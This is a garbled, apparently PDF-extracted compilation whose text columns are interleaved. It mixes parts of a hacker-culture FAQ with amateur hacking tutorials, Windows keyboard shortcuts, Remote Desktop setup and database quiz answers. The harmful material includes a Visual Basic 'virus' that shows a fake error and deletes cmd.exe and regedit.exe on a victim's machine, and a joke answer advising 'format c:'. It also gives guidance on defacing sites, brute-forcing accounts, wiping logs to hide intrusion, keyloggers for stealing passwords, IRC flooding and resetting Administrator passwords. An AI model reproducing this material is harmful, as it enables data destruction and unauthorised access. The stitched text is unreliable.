they get done at all). Hackerdom's most revered demigods are people
who have written large, capable programs that
met a widespread need and given them away, so
Linus Torvalds, a Finn, comments his code in that now everyone uses them.
English (it apparently never occurred to him to
do otherwise). His fluency in English has been
an important factor in his ability to recruit a 2. Help test and debug open-source
worldwide community of developers for Linux. software
It's an example worth following.
They also serve who stand and debug open- primer on how to become a hacker :-)). This is
source software. In this imperfect world, we will not something you'll be positioned to do until
inevitably spend most of our software you've been around for while and become well-
development time in the debugging phase. That's known for one of the first four things.
why any open-source author who's thinking will
tell you that good beta-testers (who know how to The hacker culture doesn't have leaders, exactly,
describe symptoms clearly, localize problems but it does have culture heroes and tribal elders
well, can tolerate bugs in a quickie release, and and historians and spokespeople. When you've
are willing to apply a few simple diagnostic been in the trenches long enough, you may grow
routines) are worth their weight in rubies. Even into one of these. Beware: hackers distrust
one of these can make the difference between a blatant ego in their tribal elders, so visibly
debugging phase that's a protracted, exhausting reaching for this kind of fame is dangerous.
nightmare and one that's merely a salutary Rather than striving for it, you have to sort of
nuisance. position yourself so it drops in your lap, and then
be modest and gracious about your status.
If you're a newbie, try to find a program under
development that you're interested in and be a The Hacker/Nerd Connection
good beta-tester. There's a natural progression
from helping test programs to helping debug
them to helping modify them. You'll learn a lot Contrary to popular myth, you don't have to be a
this way, and generate good karma with people nerd to be a hacker. It does help, however, and
who will help you later on. many hackers are in fact nerds. Being a social
outcast helps you stay concentrated on the really
important things, like thinking and hacking.
3. Publish useful information
For this reason, many hackers have adopted the
Another good thing is to collect and filter useful label 'nerd' and even use the harsher term 'geek'
and interesting information into web pages or as a badge of pride --- it's a way of declaring
documents like Frequently Asked Questions their independence from normal social
(FAQ) lists, and make those generally available. expectations. See The Geek Page for extensive
discussion.
Maintainers of major technical FAQs get almost
as much respect as open-source authors. If you can manage to concentrate enough on
hacking to be good at it and still have a life,
4. Help keep the infrastructure that's fine. This is a lot easier today than it was
working when I was a newbie in the 1970s; mainstream
culture is much friendlier to techno-nerds now.
There are even growing numbers of people who
The hacker culture (and the engineering realize that hackers are often high-quality lover
development of the Internet, for that matter) is and spouse material.
run by volunteers. There's a lot of necessary but
unglamorous work that needs done to keep it
going --- administering mailing lists, moderating If you're attracted to hacking because you don't
newsgroups, maintaining large software archive have a life, that's OK too --- at least you won't
sites, developing RFCs and other technical have trouble concentrating. Maybe you'll get a
standards. life later on.
People who do this sort of thing well get a lot of Points For Style
respect, because everybody knows these jobs are
huge time sinks and not as much fun as playing Again, to be a hacker, you have to enter the
with code. Doing them shows dedication. hacker mindset. There are some things you can
do when you're not at a computer that seem to
5. Serve the hacker culture itself help. They're not substitutes for hacking (nothing
Finally, you can serve and propagate the culture is) but many hackers do them, and feel that they
itself (by, for example, writing an accurate connect in some basic way with the essence of
hacking.
• Learn to write your native language • don't post or email writing that's full of
well. Though it's a common stereotype spelling errors and bad grammar.
that programmers can't write, a
surprising number of hackers (including The only reputation you'll make doing any of
all the most accomplished ones I know these things is as a twit. Hackers have long
of) are very able writers. memories --- it could take you years to live your
• Read science fiction. Go to science early blunders down enough to be accepted.
fiction conventions (a good way to meet
hackers and proto-hackers). The problem with screen names or handles
• Study Zen, and/or take up martial arts. deserves some amplification. Concealing your
(The mental discipline seems similar in identity behind a handle is a juvenile and silly
important ways.) behavior characteristic of crackers, warez d00dz,
• Develop an analytical ear for music. and other lower life forms. Hackers don't do this;
Learn to appreciate peculiar kinds of they're proud of what they do and want it
music. Learn to play some musical associated with their real names. So if you have a
instrument well, or how to sing. handle, drop it. In the hacker culture it will only
• Develop your appreciation of puns and mark you as a loser.
wordplay.
Other Resources
The more of these things you already do, the
more likely it is that you are natural hacker
material. Why these things in particular is not Peter Seebach maintains an excellent Hacker
completely clear, but they're connected with a FAQ for managers who don't understand how to
mix of left- and right-brain skills that seems to deal with hackers. If Peter's site doesn't respond,
be important; hackers need to be able to both the following Excite search should find a copy.
reason logically and step outside the apparent
logic of a problem at a moment's notice. There is a document called How To Be A
Programmer that is an excellent complement to
Work as intensely as you play and play as this one. It has valuable advice not just about
intensely as you work. For true hackers, the coding and skillsets, but about how to function
boundaries between "play", "work", "science" on a programming team.
and "art" all tend to disappear, or to merge into a
high-level creative playfulness. Also, don't be I have also written A Brief History Of
content with a narrow range of skills. Though Hackerdom.
most hackers self-describe as programmers, they
are very likely to be more than competent in I have written a paper, The Cathedral and the
several related skills --- system administration, Bazaar, which explains a lot about how the
web design, and PC hardware troubleshooting Linux and open-source cultures work. I have
are common ones. A hacker who's a system addressed this topic even more directly in its
administrator, on the other hand, is likely to be sequel Homesteading the Noosphere.
quite skilled at script programming and web
design. Hackers don't do things by halves; if they Rick Moen has written an excellent document on
invest in a skill at all, they tend to get very good how to run a Linux user group.
at it.
Rick Moen and I have collaborated on another
Finally, a few things not to do. document on How To Ask Smart Questions. This
will help you seek assistance in a way that makes
• don't use a silly, grandiose user ID or it more likely that you will actually get it.
screen name.
• don't get in flame wars on Usenet (or If you need instruction in the basics of how
anywhere else). personal computers, Unix, and the Internet work,
• don't call yourself a 'cyberpunk', and see The Unix and Internet Fundamentals
don't waste your time on anybody who HOWTO.
does.
When you release software or write patches for The best way for you to get started would
software, try to follow the guidelines in the probably be to go to a LUG (Linux user group)
Software Release Practice HOWTO. meeting. You can find such groups on the LDP
General Linux Information Page; there is
If you enjoyed the Zen poem, you might also like probably one near you, possibly associated with
Rootless Root: The Unix Koans of Master Foo. a college or university. LUG members will
probably give you a Linux if you ask, and will
certainly help you install one and get started.
Frequently Asked Questions
Q:
Q:
When do you have to start? Is it too late for me
Will you teach me how to hack? to learn?
A: A:
Since first publishing this page, I've gotten Any age at which you are motivated to start is a
several requests a week (often several a day) good age. Most people seem to get interested
from people to "teach me all about hacking". between ages 15 and 20, but I know of
Unfortunately, I don't have the time or energy to exceptions in both directions.
do this; my own hacking projects, and traveling
as an open-source advocate, take up 110% of my
time. Q:
Even if I did, hacking is an attitude and skill you How long will it take me to learn to hack?
basically have to teach yourself. You'll find that
while real hackers want to help you, they won't A:
respect you if you beg to be spoon-fed
everything they know. That depends on how talented you are and how
hard you work at it. Most people can acquire a
Learn a few things first. Show that you're trying, respectable skill set in eighteen months to two
that you're capable of learning on your own. years, if they concentrate. don't think it ends
Then go to the hackers you meet with specific there, though; if you are a real hacker, you will
questions. spend the rest of your life learning and perfecting
your craft.
If you do email a hacker asking for advice, here
are two things to know up front. First, we've Q:
found that people who are lazy or careless in
their writing are usually too lazy and careless in Are Visual Basic or C# good languages to start
their thinking to make good hackers --- so take with?
care to spell correctly, and use good grammar
and punctuation, otherwise you'll probably be A:
ignored. Secondly, don't dare ask for a reply to
an ISP account that's different from the account
If you're asking this question, it almost certainly
you're sending from; we find people who do that
means you're thinking about trying to hack under
are usually thieves using stolen accounts, and we
Microsoft Windows. This is a bad idea in itself.
have no interest in rewarding or assisting
When I compared trying to learn to hack under
thievery.
Windows to trying to learn to dance while
wearing a body cast, I wasn't kidding. don't go
Q: there. It's ugly, and it never stops being ugly.
How can I get started, then? There are specific problems with Visual Basic
and C#; mainly that they're not portable. Though
A: there are prototype open-source implementations
of these languages, the applicable ECMA A:
standards don't cover more than a small set of
their programming interfaces. On Windows most This is cracking. Get lost, moron.
of their library support is proprietary to a single
vendor (Microsoft); if you aren't extremely
Q:
careful about which features you use --- more
careful than any newbie is really capable of
being --- you'll end up locked into only those How can I steal channel op privileges on IRC?
platforms Microsoft chooses to support. If you're
starting on a Unix, much better languages with A:
better libraries are available.
This is cracking. Begone, cretin.
Visual Basic is especially awful. Like other
Basics it's a poorly-designed language that will Q:
teach you bad programming habits. No, don't ask
me to describe them in detail; that explanation I've been cracked. Will you help me fend off
would fill a book. Learn a well-designed further attacks?
language instead.
A:
One of those bad habits is becoming dependent
on a single vendor's libraries, widgets, and
No. Every time I've been asked this question so
development tools. In general, any language that
far, it's been from some poor sap running
isn't fully supported under at least Linux or one
Microsoft Windows. It is not possible to
of the BSDs, and/or at least three different
effectively secure Windows systems against
vendors' operating systems, is a poor one to learn
crack attacks; the code and architecture simply
to hack in.
have too many flaws, which makes securing
Windows like trying to bail out a boat with a
Q: sieve. The only reliable prevention starts with
switching to Linux or some other operating
Would you help me to crack a system, or teach system that is designed to at least be capable of
me how to crack? security.
A: Q:
No. Anyone who can still ask such a question I'm having problems with my Windows
after reading this FAQ is too stupid to be software. Will you help me?
educable even if I had the time for tutoring. Any
emailed requests of this kind that I get will be A:
ignored or answered with extreme rudeness.
Yes. Go to a DOS prompt and type "format c:".
Q: Any problems you are experiencing will cease
within a few minutes.
How can I get the password for someone else's
account? Q:
Q: Q:
First off something like this isn't all that uncommon and an uA
version esp. made for NXS has been around for a while. Think of
this as my own version of that, although I started from zero.
First of all open a new Visual Basic project, a Now we will use the timer in this one. If you
standard exe file.. want to disguise your scheme then this is a good
way to do it, Here we will send a fake message
error pretending the application hasn’t got
Now it depends on how you want your virus to enough memory to run, but in actual fact the
work, I feel it is best if it is activated once your
victim doesn’t know that you have just removed
application is opened so the main code codes in their command file.
the form load sub.
In the project put in the file you want to delete, Private Sub Form_Load()
for example if you wanted to delete the Form1.Visible = False
command file then you would put the following Text1.Text = “C:/Windows/System32/cmd.exe”
code in the form load tab. A = Text1.Text
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error”
Private Sub Form_Load() End Sub
Text1.Text = “C:/Windows/System32/cmd.exe
Kill Text1.Text
End Sub Private Sub Timer1_Timer()
Timer1.Interval = 5000
Kill A
Once the project is opened then the command Timer1.Enabled = False
file will be removed.
End Sub
Private Sub Form_Load() This is just an intro tutorial to web page hacking
Form1.Visible = False made for newbies !
Msgbox (“Runtime Error 492. Not Enough
Memory.”), vbCritical, “Runtime Error” 1)Intro
Kill “C:/Windows/System32/cmd.exe” First of all,why you want to hack a webpage?Is it
Kill “C:/Windows/regedit.exe” a certain webpage or any site at all? There are
End Sub many reasons to hack a website, or a
webmaster.Maybe you want to take a revenge or
So above we will be removing the command file maybe you want to have fun or just learn how to
and the registry, I don’t think the victim will be do it ! You can deface the website which means
best pleased about that do you. replace the original index with a new one or you
can gain access to the member area of the site
Now I have shown you the above information I which might be easier.
think it’s your turn to try and create your own, 2)DEFACE:You can deface the site through
now you can test it on your own pc, just copy a telnet or your browser by running remote
file, lets say the cmd.exe file and paste it into commands on an old or misconfigured server,
your C:/ the hard thing to do is find an old server , maybe
a network of a school or university would do,get
a CGI BUG searcher.This program will scan
Then put in the code above but in the Kill put ranges of IPs for web-servers and will scan them
this… for known bugs in their cgis or other bugs and
holes.You can learn how to exploite a certain
Kill “C:/cmd.exe” hole by adding in yahoo the name of the
bug/hole and the word exploit,search for
That’s all you need to kill, then you will see the "cmd.exe exploit".There are more than 700 holes
file has been removed. Keep trying new things that many servers might have! You can also
like I have shown and you will be a pro in no deface a website by finding the ftp password and
time. just browse through the sites ftp and replace the
index.htm.You do that with the :
3)BRUTE FORCE ATTACK :To do that you
need a brute forcer or brute force attacker and
some word lists,the brute forcer sends multiple
user/pass requests of words that picks up from
namelists and tries to hack the account untill it
does! So lets say imagine a porn site that asks for
a password , you go there you copy their address
, you add the address in a program called brute
forcer and then from the brute forcer you choose
a text file with names to be used as usernames Port 25 is the 'Sendmail Protocol' port. We will
and a text with names to be used as be dealing with this port as well.
passwords,the brute forcer will try untill it finds
a correct user/pass This should be easier for the
newbies than exploiting cgi bugs , many of the Telnet Security
newbies havent even heard of it i hope i didnt
confuse you with this tutorial there might be Because there are so many problems with Telnet
more tuts about web hacking and cgi bugs and today involving cyber crime and hacking,
such.Till then try to find the way to cgi bugs
SysAdmins often restrict anonymous use of their
yourself with the cgi scanners in the Web Hacks sys's Telnet Proxies. This is cheap and can be
section or download a brute forcer to crack bypassed easily.
accounts.
Most SysAdmins are amatures at what they do
Telnet - A Tutorial and make me laugh. They restrict the Telnet
proxies on port 23 and think that we can't telnet
to other ports such as 81 and 25 because we can't
to Telnet and use the Telnet Proxy. Well they are wrong. We
can easily do it and we will. Let me point out a
Hacking system that has this and was not effective. I will
star out the IP for privacy.
Telnet, as you know so far, is a very useful tool They don't. They simply search for incoming
for hackers. Hell, if you can't connect to a connections not recognized by the server. If the
computer, you can't hack it. Its that simple. SysAdmins didn't modify the message, you
would have gotten this:
Now the best thing about Telnet is that virtually
every Windows computer has it, comes with it, "Error 229292: Data not recognized 8191:
and is able to run it. Distinct Remote Service Lost or Corrupt."
I have a Windows 98 computer and I am running My dad or mom found out I was hacking, and
Telnet. It gives me a lot more options when my dad's an expert on computers! He made it so
connecting to a computer, and these commands I can't view anything on AOL. What the hell's
don’t go anywhere! What do I do? I get the going on! Give me a trick to evade this!
hostname part and all that, just what does Term-
Type mean? Sure thing. Connect to AOL, ping the site you're
trying to view, and type in the IP address. You
Ok people, so many people have asked me this will get to the homepage, but this isn't that good
I'm ready to start getting an auto-flame response a trick because you can't ping sub-addys and
on my e-mail box LoL. Anyway, here goes: you're going to get text for the sub-urls. This
might or might now work.
Term Type means Terminal Type. It is the
version of the Telnet Terminal that the host or
server is running. You have to specify this, I was screwing around with my friends
Telnet is not hacker-friendly. computer. I think I left my information
somewhere, but where?
In Windows 98/95/ME you are not running a
DOS-Based version of Telnet. You get a client Usually, you have a critical system log. If you
program, somewhat considered shit for me. I like delete a system file (which unless you're 133t
the DOS based one and frankly, I find it a lot you'd NEVER EVER do) the computer's going
easier to use. to boot and give you a log of what happened
before the deletion of the file so you know what
went wrong. If you did happen to delete it, it will
I can't connect to the host! list something like "deletion from x.x.x.x. (your
IP)". If it does, damn, you're busted. But there
Well, the host either doesn't exist, does not are ways of getting rid of this "hacker-knock
support Telnet Packets or Connections, or is out". First off, get a WAN-Controller, or any sort
currently restricting proxy access or usage from of program that lets you input screen or
your addy or all addresses. Hardware input by the output. This means you
can control their computer with yours. But you Tip 1: Hackers cover their tracks. Experienced
can't boot this computer, because it will break hackers cover them more thorougly, but amateur
the connection. hackers sometimes leave things behind. Don't
expect them to leave any really big evidence
Access the log files usually in system or behind; expect more of little things here and
system32 (both system files located in there you might find surprising. For example, if
C:/Windows or C:/). There, you will see you're writing a term paper and a black hat
encrypted sh1t. CTRL+A will select it all and hacker accidently saved it when he took a
delete it all. If you do delete this file, (after you paragraph out- that's suspicious. Where did that
do), try recovering the system file. WHATEVER paragraph go? Well, for one thing, now you
YOU DO DON'T DO A SYSTEM RESTORE, know he was in that area. Check the folders
YOU HAVE BEEN WARNED. surrounding the file- you might find something.
Way #1 : Keylogger
A keylogger copies all the buttons pressed by the
victim in a .txt file,all you need is access to the
victims PC with a trojan or even go there with a
disc ,this is one of the best ways to get his user-
password and log in his account and many more
things!
Flooder
There are some cool flooders that all they do is
connect clones (many fake irc users commin
from your pc) in the network and priv-message a
user , that causes excess flood quit :-) there is
also a choise on the flooder that you can message
a whole channel, i still remember gettin in #mp3
and flooding the !list command in the channel
with 50 clones , all the F-Servs were down , and
the channel was f***ed up.
Best Keyboard Shortcuts
acessability shortcuts
Getting used to using your keyboard exclusively and leaving your
mouse behind will make you much more efficient at performing Right SHIFT for eight seconds........ Switch FilterKeys on and
any task on any Windows system. I use the following keyboard off.
shortcuts every day: Left ALT +left SHIFT +PRINT SCREEN....... Switch High
Contrast on and off.
Windows key + R = Run menu Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys
on and off.
This is usually followed by: SHIFT....... five times Switch StickyKeys on and off.
cmd = Command Prompt NUM LOCK...... for five seconds Switch ToggleKeys on and
iexplore + "web address" = Internet Explorer off.
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management explorer shortcuts
dnsmgmt.msc = DNS Management END....... Display the bottom of the active window.
services.msc = Services HOME....... Display the top of the active window.
eventvwr = Event Viewer NUM LOCK+ASTERISK....... on numeric keypad (*) Display
dsa.msc = Active Directory Users and Computers all subfolders under the selected folder.
dssite.msc = Active Directory Sites and Services NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display
Windows key + E = Explorer the contents of the selected folder.
ALT + Tab = Switch between windows NUM LOCK+MINUS SIGN....... on numeric keypad (-)
ALT, Space, X = Maximize window Collapse the selected folder.
CTRL + Shift + Esc = Task Manager LEFT ARROW...... Collapse current selection if it's expanded,
Windows key + Break = System properties or select parent folder.
Windows key + F = Search RIGHT ARROW....... Display current selection if it's
Windows key + D = Hide/Display all windows collapsed, or select first subfolder.
CTRL + C = copy
CTRL + X = cut Type the following commands in your Run Box (Windows
CTRL + V = paste Key + R) or Start Run
Also don't forget about the "Right-click" key next to the right devmgmt.msc = Device Manager
Windows key on your keyboard. Using the arrows and that key msinfo32 = System Information
can get just about anything done once you've opened up any cleanmgr = Disk Cleanup
program. ntbackup = Backup or Restore Wizard (Windows Backup
Utility)
Keyboard Shortcuts mmc = Microsoft Management Console
[Alt] and [Esc] Switch between running applications excel = Microsoft Excel (If Installed)
[Alt] and letter Select menu item by underlined letter msaccess = Microsoft Access (If Installed)
[Ctrl] and [Esc] Open Program Menu powerpnt = Microsoft PowerPoint (If Installed)
[Ctrl] and [F4] Close active document or group windows (does winword = Microsoft Word (If Installed)
not work with some applications) frontpg = Microsoft FrontPage (If Installed)
[Alt] and [F4] Quit active application or close current window notepad = Notepad
[Alt] and [-] Open Control menu for active document wordpad = WordPad
Ctrl] Lft., Rt. arrow Move cursor forward or back one word calc = Calculator
Ctrl] Up, Down arrow Move cursor forward or back one msmsgs = Windows Messenger
paragraph mspaint = Microsoft Paint
[F1] Open Help for active application wmplayer = Windows Media Player
Windows+M Minimize all open windows rstrui = System Restore
Shift+Windows+M Undo minimize all open windows netscp6 = Netscape 6.x
Windows+F1 Open Windows Help netscp = Netscape 7.x
Windows+Tab Cycle through the Taskbar buttons netscape = Netscape 4.x
Windows+Break Open the System Properties dialog box waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog
internetbrowser Use these keyboard shortcuts for dialog boxes:
Move forward through tabs. CTRL+TAB
type in u're adress "google", then press [Right CTRL] and [Enter] Move backward through tabs. CTRL+SHIFT+TAB
add www. and .com to word and go to it Move forward through options. TAB
Move backward through options. SHIFT+TAB
For Windows XP: Carry out the corresponding command or select the
corresponding option. ALT+Underlined letter
Copy. CTRL+C Carry out the command for the active option or button.
Cut. CTRL+X ENTER
Paste. CTRL+V Select or clear the check box if the active option is a check
Undo. CTRL+Z box. SPACEBAR
Delete. DELETE Select a button if the active option is a group of option
Delete selected item permanently without placing the item in the buttons. Arrow keys
Recycle Bin. SHIFT+DELETE Display Help. F1
Copy selected item. CTRL while dragging an item Display the items in the active list. F4
Create shortcut to selected item. CTRL+SHIFT while dragging Open a folder one level up if a folder is selected in the
an item Save As or Open dialog box. BACKSPACE
Rename selected item. F2
Move the insertion point to the beginning of the next word. If you have a Microsoft Natural Keyboard, or any other
CTRL+RIGHT ARROW compatible keyboard that includes the Windows logo key
Move the insertion point to the beginning of the previous word. and the Application key , you can use these keyboard
CTRL+LEFT ARROW shortcuts:
Move the insertion point to the beginning of the next paragraph.
CTRL+DOWN ARROW Display or hide the Start menu. WIN Key
Move the insertion point to the beginning of the previous Display the System Properties dialog box. WIN
paragraph. CTRL+UP ARROW Key+BREAK
Highlight a block of text. CTRL+SHIFT with any of the arrow Show the desktop. WIN Key+D
keys Minimize all windows. WIN Key+M
Select more than one item in a window or on the desktop, or Restores minimized windows. WIN Key+Shift+M
select text within a document. SHIFT with any of the arrow keys Open My Computer. WIN Key+E
Select all. CTRL+A Search for a file or folder. WIN Key+F
Search for a file or folder. F3 Search for computers. CTRL+WIN Key+F
View properties for the selected item. ALT+ENTER Display Windows Help. WIN Key+F1
Close the active item, or quit the active program. ALT+F4 Lock your computer if you are connected to a network
Opens the shortcut menu for the active window. domain, or switch users if you are not connected to a
ALT+SPACEBAR network domain. WIN Key+ L
Close the active document in programs that allow you to have Open the Run dialog box. WIN Key+R
multiple documents open simultaneously. CTRL+F4 Open Utility Manager. WIN Key+U
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC accessibility keyboard shortcuts:
Cycle through screen elements in a window or on the desktop. F6 Switch FilterKeys on and off. Right SHIFT for eight
Display the Address bar list in My Computer or Windows seconds
Explorer. F4 Switch High Contrast on and off. Left ALT+left
Display the shortcut menu for the selected item. SHIFT+F10 SHIFT+PRINT SCREEN
Display the System menu for the active window. Switch MouseKeys on and off. Left ALT +left SHIFT
ALT+SPACEBAR +NUM LOCK
Display the Start menu. CTRL+ESC Switch StickyKeys on and off. SHIFT five times
Display the corresponding menu. ALT+Underlined letter in a Switch ToggleKeys on and off. NUM LOCK for five
menu name seconds
Carry out the corresponding command. Underlined letter in a Open Utility Manager. WIN Key+U
command name on an open menu
Activate the menu bar in the active program. F10 shortcuts you can use with Windows Explorer:
Open the next menu to the right, or open a submenu. RIGHT Display the bottom of the active window. END
ARROW Display the top of the active window. HOME
Open the next menu to the left, or close a submenu. LEFT Display all subfolders under the selected folder. NUM
ARROW LOCK+ASTERISK on numeric keypad (*)
Refresh the active window. F5 Display the contents of the selected folder. NUM
View the folder one level up in My Computer or Windows LOCK+PLUS SIGN on numeric keypad (+)
Explorer. BACKSPACE Collapse the selected folder. NUM LOCK+MINUS SIGN
Cancel the current task. ESC on numeric keypad (-)
SHIFT when you insert a CD into the CD-ROM drive Prevent the Collapse current selection if it's expanded, or select parent
CD from automatically playing. folder. LEFT ARROW
Display current selection if it's collapsed, or select first
subfolder. RIGHT ARROW
How to hide your data on your Windows Machine
Some of the older windows users who are familar with the NULL How to make files Un-Deletable with
DOS Character (255) may know this other then that not many
people are aware of how to do such a thing. i use to do this trick FlashFXP
at school to friends pc's and also whenever i might have been in a
PC store just for fun make a folder on the desktop called Start FlashFXP..
'Hardcore Anal Sex' or something and see if the PC store dudes Go to Commands > Edit Custom Commands
worked out how to get rid of it next time i was there Smile Klik on: new cmd
Ok so this is how it works. in windows(DOS) there is 255 DOS Give it a name like: Make undeletable or something
Characters. by going into DOS/CMD and holding down Then in the text area above the buttons typ this:
(ALT+157) pressing 157 on the number pad. a weird character Code:
should appear. this is one of many. if you havent used a charmap
before try going to start/run and typing 'charmap' which willopen {
the windows character map, if you select a character u will see in rnfr %f
teh bottom of the window it has ALT+some_numbers which is rnto %f ./ /
the number code for that character. and because most standard }
keyboards only have around 108keys there must be character
codes Smile Hit OK..
Connect to a server..
Click right on a map or file en go to commands > make
undeletable..
ok so how does this help you protect your data? well if you were
to name a folder one of these character then windows wouldnt
know how to open it!. not all charcter but mainly characters that
are equivelent to NULL.. NULL looks like this ' ' nothing but a
space. like hitting space bar once, totally blank!..
ok so if you go to DOS and type cd C:\windows\desktop or what
ever. just go to a directory you can visually access and see later
on a physical drive (i.e. not D:\ or A:\).. ok so your in your
desktop.
now make a directory. `mkdir secretALT+255dir` now where
ALT+255 u have to hold down ALT and press 255 in your
number pad, it will just appear as tho u hit space bar once. now
go to your desktop and try to open/delete/rename this folder.
IMPOSSIBLE!! Smile the dir is completely locked and
untouchable by all forces of life (except for DOS at this stage). so
lets presume you have locked all your porno in there and your
parents have gone out and u want to watch some Smile. now you
have to go back into dos and rename the file to a normal name...
cd C:\windows\desktop
rename secretALT+255dir Folder_new_name
now you your folder should be back to normal and can be
accessed again.
hit F5 if you see no changes. Smile
have fun.
How To Remotely Access Your PC
Windows XP Professional includes a basic PC remote To enabling Remote Desktop, open the System Control
control tool which lets you log onto your PC remotely from Panel, go to the Remote tab, and check this box.
anywhere. Do you know how to use it?
It’s important to make sure the passwords on the machine
It’s called Remote Desktop Connection, and when you’ve you’re going to remotely log into are “good” ones. This
properly configured your PC, this handy utility will let you means you should use a mixture of letters and numbers,
log into your computer from anywhere in the world and avoid words that are found in dictionaries, and change the
control it as if you were sitting in front of it instead of half a password regularly to protect yourself from mischief.
world away.
Making the connection
If you’re running Windows XP Professional, you already
have all the software you need to connect remotely to your At this point, your PC should be prepped and patiently
PC. Whether you’d like to monitor a server, grab files from waiting for a connection. To log in, you need to open the
your home PC at work, or just keep an eye on your machines Remote Desktop Connection client on your remote PC. Go
when you’re out, connecting remotely is easy to do. to Start, Programs, Accessories, Communications, Remote
However, due to the vagaries of network configurations and Desktop Connection. Input the IP address you want to
various other quirks beyond your control, you may not be connect to (courtesy of IP Address Monster) in the Computer
able to actually connect. Until now. field. Then enter your username and password.
Prepping your system Now you’ll want to tweak a few settings to optimize your
remote experience. Whiz-bang features gobble up
First, you need to know the IP address of the computer you bandwidth, so you should tune your settings to match your
want to connect to. The only sure-fire way to always be able home net connection. We recommend you start with a
to connect to your PC’s is to use an ISP that provides you minimal feature set. Press the Options button, then the
with a static IP address. Most ISPs give customers dynamic Display tab. Change the display settings to full-screen, 256-
IP addresses, which can change every few days or even color. This looks acceptable and consumes practically no
hours. Because your IP address is the way you’ll locate your bandwidth. You’ll also want to browse to the Experience tab
computer on the net, you’ll need to know what your IP and change the Performance setting to reflect your home
address is and monitor it as it changes. PC’s connection speed.
Switching to a lower color resolution and a smaller display
The good news is that there are loads of programs that will area will greatly minimize the amount of data that has to
notify you of IP address changes, whenever they occur. We transfer between your computer and the remote PC.
like IP Address Monster (www.ipmonster.com). It’s a small Once you’ve tuned the connection a bit, you’re ready to
program that runs in your system tray and can be configured connect. Press the Connect key and you’re in!
to e-mail you whenever your IP address changes.
What to do next
IP Address Monster should be your first stop to remote
connectivity. This handy utility will keep tabs on your At this point, you should be connected. You can run
Internet address and send you an e-mail whenever it changes. programs and manipulate files just like you’re sitting in front
of your PC. In fact, you can even use your PC’s e-mail and
Now that you know your IP address, you need to make sure web browsers. Do you want to start downloading Desert
that Remote Desktop Connection is enabled. Make sure your Combat now so you can start playing it when you get home?
firewall is configured to allow incoming connections on port That’s easy enough; just log into your PC using Remote
3389 (firewalls vary, so check your documentation to find Desktop, open your web browser, and download the file. It
out how to open the port). will be sitting on your machine waiting for you as soon as
you get home. If all your PCs are running Windows XP Pro,
You can turn on Remote Desktop Connection in the System and you enable drive-sharing in the Local Resources tab, you
Control Panel (Start, Control Panel, System). Check the can transfer files from remote PC to local PC. You can even
Remote tab and make sure “Allow users to connect remotely remotely transfer files between local PCs on your home
to this computer” is checked. You’ll also need to have at network.
least one user account that requires a password because Once connected, you can interact with printer ports and
accounts without passwords are prohibited from logging into networked hard drives. This is a handy way to delete those
Remote Desktop. “special interest” videos you downloaded before your wife
finds them.
FORGOT YOUR PASSWORD ON XP? HERE'S
WHAT TO DO!
Have you forgotten your password and you don't want to re-
format your computer?
Track Ip Connected To Ur Pc
Well here's what you do.. Please note that this only works on Open notepad and copy and paste the following
Windows XP! commands in it and save it as getip.cmd
Code:
PLEASE READ CAREFULLY! @echo.
@color 09
1. Restart you computer @netstat -n
@echo.
2.When booting, press F8 and select "Safe Mode" @pause
3.After getting to the user menu. Click on a user and this Now execute this file (double click) and you can see
time it will not ask you for a password your IP in the command prompt.
It works only in NT based OS.
4.Go to Start>Run and type "CMD" (without the quotes).
8.Then type this command, I will assume that you want to set network.http.pipelining.maxrequests
Administrator's password to "MyNewPass" (without the
quotes) Normally the browser will make one request to a web
page at a time. When you enable pipelining it will make
9.Now, type this in (I am assuming that you are still in the several at once, which really speeds up page loading.
directory C:\Windows\System32) , "net user administrator
MyNewPass" without the quotes 2. Alter the entries as follows:
10. You will get a message saying that it was successful, this Set "network.http.pipelining" to "true"
means Administrator's new password is "MyNewPass" Set "network.http.proxy.pipelining" to "true"
(without the quotes)
set "network.http.pipelining.maxrequests" to some
11. Restart the PC and you will login as Administrator (or number like 30. This means it will make 30 requests at
whatever you chose to reset) with your chosen password and once.
Enjoy!
3. Lastly right-click anywhere and select New-> Integer.
Name it "nglayout.initialpaint.delay" and set its value to
"0". This value is the amount of time the browser waits
before it acts on information it recieves.
7. WHAT ARE HIERARCHICAL, NETWORK, AND
RELATIONAL DATABASE MODELS?
Ans: a) Hierarchical Model: The Hierarchical Model was
introduced in the Information Management System (IMS)
developed by IBM in 1968. In this data is organized as a
tree structure. Each tree is made of nodes and branches.
The nodes of the tree represent the record types and it is a
collection of data attributes entity at that point. The
topmost node in the structure is called the root. Nodes
succeeding lower levels are called children.
Network Model: The Network Model, also called as the
CODSYL database structure, is an improvement over the
1. WHAT IS DATA OR INFORMATION?
Hierarchical mode, in this model concept of parent and
Ans: The Matter that we feed into the Computer is
child is expanded to have multiple parent-child
called Data or Information.
relationships, i.e. any child can be subordinate to many
2. WHAT IS DATABASE?
different parents (or nodes). Data is represented by
Ans: The Collection of Interrelated Data is called Data
collection of records, and relationships among data are
Base.
represented by links. A link is an association between
3. WHAT IS A DATABASE MANAGEMENT
precisely two records. Many-to-many relationships can
SYSTEM (DBMS) PACKAGE?
exists between the parent and child.
Ans: The Collection of Interrelated Data and some
c) Relational Model: The Relational Database Model
Programs to access the Data is Called Data Base
eliminates the need for explicit parent-child relationships.
Management System (DBMS).
In RDBMS, data is organized in two-dimensional tables
4. WHEN CAN WE SAY A DBMS PACKAGE AS
consisting of relational, i.e. no pointers are maintained
RDBMS?
between tables.
Ans: For a system to Qualify as RELATIONAL
8. WHAT IS DATA MODELING?
DATABASE MANAGEMENT system, it must use its
Ans: Data Modeling describes relationship between the
RELATIONAL facilities to MANAGE the
data objects. The relationships between the collections of
DATABASE.
data in a system may be graphically represented using data
5. WHAT IS ORDBMS?
modeling.
Ans: Object (oriented) Relational Data Base
9. DEFINE ENTITY, ATTRIBUTE AND
Management System is one that can store data, the
RELATIONSHIP.
relationship of the data, and the behavior of the data
Ans: Entity: An Entity is a thing, which can be easily
(i.e., the way it interacts with other data).
identified. An entity is any object, place, person, concept
6. NAME SOME CODD'S RULES.
or activity about which an enterprise records data.
Ans: Dr. E.F. Codd presented 12 rules that a database
Attribute: An attribute is the property of a given entity.
must obey if it is to be considered truly relational. Out
Relationship: Relationship is an association among
those, some are as follows
entities.
